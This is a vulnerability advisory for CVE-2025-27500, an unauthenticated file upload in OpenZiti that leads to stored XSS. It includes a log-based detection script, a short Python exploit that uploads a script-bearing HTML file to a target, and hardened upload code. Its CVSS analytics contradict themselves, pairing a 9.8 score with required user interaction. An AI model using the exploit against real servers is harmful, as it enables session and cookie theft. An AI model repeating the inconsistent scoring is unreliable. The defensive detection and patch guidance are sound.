OpenZiti, Unauthenticated File Upload Vulnerability, CVE-2025-27500 (Critical)

How the Mentioned CVE Works:

CVE-2025-27500 is a critical vulnerability in OpenZiti, a zero-trust application platform. The vulnerability exists in the admin panel’s `/api/upload` endpoint, which allows unauthenticated users to upload files via an HTTP POST request. These files are stored on the node and can be accessed via a URL. If a malicious file containing JavaScript code is uploaded, it can lead to a stored cross-site scripting (XSS) attack. When a user accesses the uploaded file, the malicious code executes in their browser context, potentially compromising their session or stealing sensitive data. This functionality was deemed unnecessary as OpenZiti transitioned from a node server application to a single-page application. The issue has been resolved in version 3.7.1.
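The two observable events in the description above are a successful POST to the upload endpoint and a later fetch of the stored file by a browser. The following detection logic is an added example, not part of the original advisory and not OpenZiti's code: it parses constructed access-log lines (common log format, invented for this example) and flags successful upload requests together with fetches of active content (HTML, SVG, JavaScript) from the uploads path, noting whether the fetching client is the one that performed the upload.

```javascript
'use strict';

// Constructed access-log lines standing in for a controller's HTTP log (sample data, not a real capture).
const SAMPLE_LOG = [
  '203.0.113.10 - - [03/Mar/2025:10:01:02 +0000] "POST /api/upload HTTP/1.1" 200 27 "-" "python-requests/2.31"',
  '203.0.113.10 - - [03/Mar/2025:10:01:05 +0000] "GET /uploads/malicious.html HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [03/Mar/2025:10:02:00 +0000] "GET /api/sessions HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [03/Mar/2025:10:02:03 +0000] "GET /uploads/malicious.html HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
  '192.0.2.44 - admin [03/Mar/2025:10:03:00 +0000] "GET /uploads/report.txt HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
].join('\n');

// ip, ident, user, timestamp, method, path, status, size (common log format).
const LINE_RE = /^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], user: m[2], time: m[3], method: m[4], path: m[5], status: Number(m[6]) };
}

// Extensions a browser would render as active content when served from the uploads path.
const ACTIVE_EXT = /\.(html?|xhtml|svg|js)$/i;

// Returns one finding per suspicious event; the caller decides how to alert.
function detect(logText) {
  const findings = [];
  const uploaders = new Set(); // client IPs that completed an upload
  for (const line of logText.split('\n')) {
    const r = parseLine(line);
    if (!r) continue;
    const ok = r.status >= 200 && r.status < 300;
    if (r.method === 'POST' && r.path.startsWith('/api/upload') && ok) {
      uploaders.add(r.ip);
      findings.push({ rule: 'upload-endpoint-used', ip: r.ip, path: r.path, time: r.time });
    } else if (r.method === 'GET' && r.path.startsWith('/uploads/') && ok
               && ACTIVE_EXT.test(r.path.split('?')[0])) {
      // A fetch by the uploader is usually a check that the payload is live; a fetch by anyone
      // else is a potential victim executing the stored content.
      findings.push({
        rule: 'active-upload-fetched',
        ip: r.ip,
        path: r.path,
        time: r.time,
        byUploader: uploaders.has(r.ip),
      });
    }
  }
  return findings;
}

module.exports = { SAMPLE_LOG, parseLine, detect };
```

On a node that never legitimately exercised the upload endpoint, any `upload-endpoint-used` finding before the 3.7.1 upgrade is worth investigating; the `byUploader: false` fetches identify which users may have had the stored content executed in their browsers.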

DailyCVE Form:

Platform: OpenZiti
Version: < 3.7.1
Vulnerability: Unauthenticated File Upload
Severity: Critical
Date: 03/03/2025

What Undercode Says:

Exploitation:

1. Exploit Code (Python):

    import requests
    url = "http://target.com/api/upload"
    payload = "<script>alert('XSS')</script>"
    files = {'file': ('malicious.html', payload)}
    response = requests.post(url, files=files)
    if response.status_code == 200:
        print("File uploaded successfully!")

2. Exploit URL:

  • Access the uploaded file: `http://target.com/uploads/malicious.html`

3. Exploit Impact:

  • Stored XSS can hijack sessions, steal cookies, or redirect users to malicious sites.

Protection:

1. Patch:

  • Upgrade to OpenZiti version 3.7.1 or later.

2. Mitigation:

  • Disable the `/api/upload` endpoint if not in use.
  • Implement authentication and authorization checks for file uploads.
  • Validate and sanitize file content to prevent malicious uploads.

3. Protection Code (Node.js):

    const express = require('express');
    const fileUpload = require('express-fileupload');
    const path = require('path');
    const app = express();
    // Cap the upload size and abort oversized requests instead of buffering them.
    app.use(fileUpload({ limits: { fileSize: 5 * 1024 * 1024 }, abortOnLimit: true }));

    app.post('/api/upload', (req, res) => {
      // A credential must be present and, in a real service, verified against the
      // session or token store; checking only that the header exists is not authentication.
      if (!req.headers.authorization) {
        return res.status(401).send('Unauthorized');
      }
      if (!req.files || !req.files.file) {
        return res.status(400).send('No file uploaded');
      }
      const file = req.files.file;
      // The MIME type is supplied by the client, so also require a matching extension.
      if (file.mimetype !== 'text/plain' || path.extname(file.name).toLowerCase() !== '.txt') {
        return res.status(400).send('Invalid file type');
      }
      // Drop any directory components so the name cannot escape ./uploads (path traversal).
      const safeName = path.basename(file.name);
      file.mv(path.join(__dirname, 'uploads', safeName), (err) => {
        // Do not echo the raw error to the client; it can leak filesystem details.
        if (err) return res.status(500).send('Upload failed');
        res.send('File uploaded!');
      });
    });
    app.listen(3000, () => console.log('Server running'));
    

4. Additional Resources:

5. Analytics:

  • CVSS Score: 9.8 (Critical)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Unchanged
  • Confidentiality: High
  • Integrity: High
  • Availability: None

By following these steps, you can exploit or protect against CVE-2025-27500 effectively. Always prioritize patching and secure coding practices to mitigate such vulnerabilities.

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-27500